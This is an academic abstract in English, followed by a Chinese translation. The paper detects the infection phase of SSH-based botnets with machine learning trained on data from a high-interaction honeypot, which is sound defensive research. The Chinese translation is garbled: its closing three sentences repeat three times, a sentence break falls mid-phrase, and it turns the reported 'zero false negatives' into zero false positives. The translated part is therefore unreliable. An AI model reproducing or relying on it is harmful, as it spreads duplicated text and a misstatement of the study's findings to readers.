Botnets are causing severe damages to users, companies, and governments through information theft, abuse of online services, DDoS attacks, etc. Although significant research is being made to detect them and mitigate their effect, they are exponentially increasing due to new zero-day attacks, a variation of their behavior, and obfuscation techniques. High Interaction Honeypots (HIH) are the only honeypots able to capture attacks and log all the information generated by attackers when setting up a botnet. The data generated is being processed using Machine Learning (ML) techniques for detection since they can detect hidden patterns. However, so far, research has been focused on intermediate phases of the botnet’s life cycle during operation, underestimating the initial phase of infection. To the best of our knowledge, this is the first solution in the infection phase of SSH-based botnets. Therefore, we have designed an approach based on an SSH-based HIH to generate a dataset consisting of executed commands and network information. Herein, we have applied ML techniques for the development of a real-time detection model. This approach reached a very high level of prediction and zero false negatives. Indeed, our system detected all known and unknown SSH sessions intended to infect our honeypots. Thus, our research has demonstrated that new SSH infections can be detected through ML techniques.

僵尸网络通过信息盗窃，滥用在线服务，DDoS攻击等对用户，公司和政府造成严重损害。尽管正在进行大量研究来检测它们并减轻其影响，但由于新的零日攻击，其数量呈指数增长。攻击，行为变化和混淆技术。在设置僵尸网络时，高交互蜜罐（HIH）是唯一能够捕获攻击并记录攻击者生成的所有信息的蜜罐。由于生成的数据可以检测隐藏的模式，因此正在使用机器学习（ML）技术对其进行处理以进行检测。但是，到目前为止，研究一直集中在僵尸网络运行过程中生命周期的中间阶段，低估了感染的初始阶段。据我们所知，这是基于SSH的僵尸网络感染阶段的第一个解决方案。因此，我们设计了一种基于SSH的HIH的方法来生成由执行的命令和网络信息组成的数据集。在本文中，我们已将ML技术应用于实时检测模型的开发。这种方法达到了很高的预测水平，误报率为零。实际上，我们的系统检测到了所有旨在感染蜜罐的已知和未知SSH会话。因此，我们的研究表明，可以通过ML技术检测到新的SSH感染。这种方法达到了很高的预测水平，误报率为零。实际上，我们的系统检测到了所有旨在感染蜜罐的已知和未知SSH会话。因此，我们的研究表明，可以通过ML技术检测到新的SSH感染。这种方法达到了很高的预测水平，误报率为零。实际上，我们的系统检测到了所有旨在感染蜜罐的已知和未知SSH会话。因此，我们的研究表明，可以通过ML技术检测到新的SSH感染。